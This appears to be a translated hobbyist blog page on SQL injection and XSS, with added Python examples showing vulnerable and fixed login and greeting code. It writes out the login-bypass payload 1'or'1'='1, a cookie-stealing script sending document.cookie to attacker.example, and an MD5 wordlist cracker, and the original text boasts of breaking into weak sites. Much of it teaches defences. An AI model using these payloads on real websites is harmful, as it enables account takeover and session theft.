It is a technique used to break into websites on the Internet from a remote computer.
SQL injection
* Usually SQL injection is carried out on the login form, where we use it to obtain the username and password.

Remote SQL Injection
It happens in the URL / address bar, where we paste the injection into the URL field to obtain the username and password,
where:
username = plaintext
password = hash (e.g. r7hy89p10) ::> which cannot be read directly
To get the password we need an MD5 cracker or a base64 decoder. Note the difference: MD5 is a one-way hash, so there is no "decoder" as such; the hash is cracked by hashing candidate passwords (a wordlist) and comparing the results. Base64 is a reversible encoding, not a hash at all, so a base64 "password" decodes directly without any guessing.
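The two cases above, as an added example that is not from the original page: a small Python script that tells a 32-hex MD5 value apart from a base64 value, cracks the MD5 by hashing a constructed wordlist (a real attack would use a large list such as rockyou.txt), and decodes the base64 directly. The hash values and wordlist are constructed for the example; the page's own value r7hy89p10 is included to show it is neither a valid MD5 digest nor valid base64.

```python
import base64
import binascii
import hashlib

# Constructed sample wordlist; a real crack would use a large list such as rockyou.txt.
WORDLIST = ["123456", "qwerty", "password", "letmein", "abc123"]


def md5_hex(word):
    """MD5 of a candidate password, as the 32-char lowercase hex string seen in dumps."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


def looks_like_md5(value):
    """A raw MD5 digest is exactly 32 hex characters; anything else is not MD5."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def crack_md5(target_hex, wordlist):
    """'Decode' an MD5 hash the only way possible: hash each candidate and compare.

    Returns the matching plaintext, or None when no candidate matches.
    """
    target = target_hex.lower()
    for word in wordlist:
        if md5_hex(word) == target:
            return word
    return None


def try_base64(value):
    """Base64 is a reversible encoding, not a hash: a valid base64 value decodes
    directly, no wordlist needed. Returns None if the value is not valid base64."""
    try:
        raw = base64.b64decode(value, validate=True)
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def recover_password(value, wordlist=WORDLIST):
    """Pick the right tool for a value pulled out of the password column."""
    if looks_like_md5(value):
        return ("md5", crack_md5(value, wordlist))
    return ("base64", try_base64(value))


if __name__ == "__main__":
    # Constructed inputs: MD5 of a weak password, a base64 "password", and the page's r7hy89p10.
    for v in ["5f4dcc3b5aa765d61d8327deb882cf99", "c2VjcmV0MTIz", "r7hy89p10"]:
        print(v, "->", recover_password(v))
```

Running it shows the MD5 dump resolving to "password" only because that word is in the list, the base64 value decoding to "secret123" with no guessing, and r7hy89p10 resolving to nothing either way.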
XSS (Cross-Site Scripting)
It is a technique used by an attacker to deliver a script of their choosing to a web user. XSS usually occurs in web applications. The scripts normally used in XSS are JavaScript or VBScript. XSS is most often used to steal cookies from a website, since a script running in the victim's browser can read document.cookie and send it to the attacker.

example:

XSS happens at ->
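The cookie-stealing XSS described above, as an added example that is not from the original page: a Python rendering of a greeting page that reflects a user-supplied name, once unescaped (vulnerable) and once HTML-escaped (fixed), plus a Set-Cookie header with HttpOnly so that even a script that does run cannot read the session cookie. The payload and the host attacker.example are constructed placeholders.

```python
import html

# Constructed payload of the kind the page describes: it "loads an image" from the
# attacker's host with the victim's cookies in the query string. attacker.example
# is a placeholder, not a real site.
COOKIE_STEALER = ("<script>new Image().src='http://attacker.example/c?'"
                  "+document.cookie</script>")


def render_vulnerable(name):
    """Greeting page that reflects the 'name' parameter into the HTML unchanged."""
    return "<p>Hello, " + name + "</p>"


def render_safe(name):
    """Same page with the user value HTML-escaped: < > & " ' become entities,
    so the browser shows the payload as text instead of running it."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def contains_live_script(page):
    """True if the browser would see a real <script> element in this page."""
    return "<script" in page.lower()


def session_cookie_header(value):
    """Set-Cookie with HttpOnly: the cookie is still sent with requests, but
    document.cookie no longer exposes it to injected JavaScript."""
    return "Set-Cookie: session=" + value + "; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    print(render_vulnerable(COOKIE_STEALER))  # payload lands as a live <script> element
    print(render_safe(COOKIE_STEALER))        # payload lands as harmless text
    print(session_cookie_header("abc123"))
```

Escaping at output time is the fix for the injection itself; HttpOnly is defence in depth that limits what a successful injection can steal.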

RFI happens at ->
Ways to protect against SQL injection

1. Use an if...else statement in the login code
2. Escape all single quotes (')

example:

Username : 1'or'1'='1
Password : 1'or'1'='1

$SqL = "SELECT namapenyelia, tahap_penyelia, id_penyelia
        FROM penyelia WHERE username='$name' AND password='$pass'";

// any username (or password) containing a quote is rejected before the query is built
if (strpos($name, "'") !== false || strpos($pass, "'") !== false) { exit('invalid login'); }

The purpose of the if...else statement is to:

1. Check the contents of the $name (and $pass) variable.
2. Reject the login if it contains a single quote.

Note that the check must cover every value that goes into the query, not only $name: in the example above the payload is in the password field too. Filtering quotes only works for fields wrapped in quotes in the SQL; the reliable fix is a prepared statement (PDO or mysqli with placeholders), which keeps the input as data so it can never become part of the query.
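The login query above, as an added example that is not from the original page, in Python with an in-memory SQLite table instead of the page's PHP/MySQL: the string-built query that the payload bypasses, the page's quote filter applied to both fields, and the parameterized query that the payload cannot bypass. The penyelia table and its single user are constructed for the example.

```python
import sqlite3

PAYLOAD = "1'or'1'='1"  # the username/password value from the page


def make_db():
    """Constructed in-memory copy of the page's penyelia (supervisor) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE penyelia (id_penyelia INTEGER, namapenyelia TEXT, "
        "tahap_penyelia TEXT, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO penyelia VALUES (1, 'Ali', 'admin', 'ali', 'secret123')")
    return conn


def login_vulnerable(conn, name, pw):
    """Builds the query by string concatenation, exactly like the page's $SqL line.
    With the payload the WHERE clause becomes
    username='1'or'1'='1' AND password='1'or'1'='1', which is always true."""
    sql = ("SELECT namapenyelia, tahap_penyelia, id_penyelia FROM penyelia "
           "WHERE username='" + name + "' AND password='" + pw + "'")
    return conn.execute(sql).fetchall()


def has_single_quote(value):
    return "'" in value


def login_quote_filter(conn, name, pw):
    """The page's mitigation, applied to BOTH fields: reject any input holding a quote."""
    if has_single_quote(name) or has_single_quote(pw):
        return []
    return login_vulnerable(conn, name, pw)


def login_parameterized(conn, name, pw):
    """The proper fix: placeholders keep the input as data, never as SQL."""
    sql = ("SELECT namapenyelia, tahap_penyelia, id_penyelia FROM penyelia "
           "WHERE username=? AND password=?")
    return conn.execute(sql, (name, pw)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", login_vulnerable(db, PAYLOAD, PAYLOAD))   # logs in as Ali
    print("quote filter:  ", login_quote_filter(db, PAYLOAD, PAYLOAD))  # rejected
    print("parameterized: ", login_parameterized(db, PAYLOAD, PAYLOAD))  # no row
```

The quote filter stops this particular payload, but it only helps for values that sit inside quotes in the SQL; the parameterized version needs no filter at all, because the driver never lets the input become part of the statement.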

Another way to protect your website:

1. Encrypt HTML files and hide source code
2. Disable content filters
3. Block website rippers
4. Customize HTML and add some effects

more info ->http://www.aerotags.com/products/tlp.php

(Note: these are features of a commercial HTML obfuscation product. Hiding or "encrypting" the HTML source does not stop SQL injection, because the injected text still reaches the server through the form field or the URL and is still inserted into the query.)
SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data. An SQL query is a request for some action to be performed on a database. Typically, on a Web form for user authentication, when a user enters their name and password into the text boxes provided for them, those values are inserted into a SELECT query. If the values entered are found as expected, the user is allowed access; if they aren't found, access is denied. However, most Web forms have no mechanisms in place to block input other than names and passwords. Unless such precautions are taken, an attacker can use the input boxes to send their own request to the database, which could allow them to download the entire database or interact with it in other illicit ways.
1' or '1' = '1

By using this payload (the so-called "magic quote") we can easily break into many websites that have weak security.
4 days off... going back to my hometown... great... I'll edit this page next week, ok...
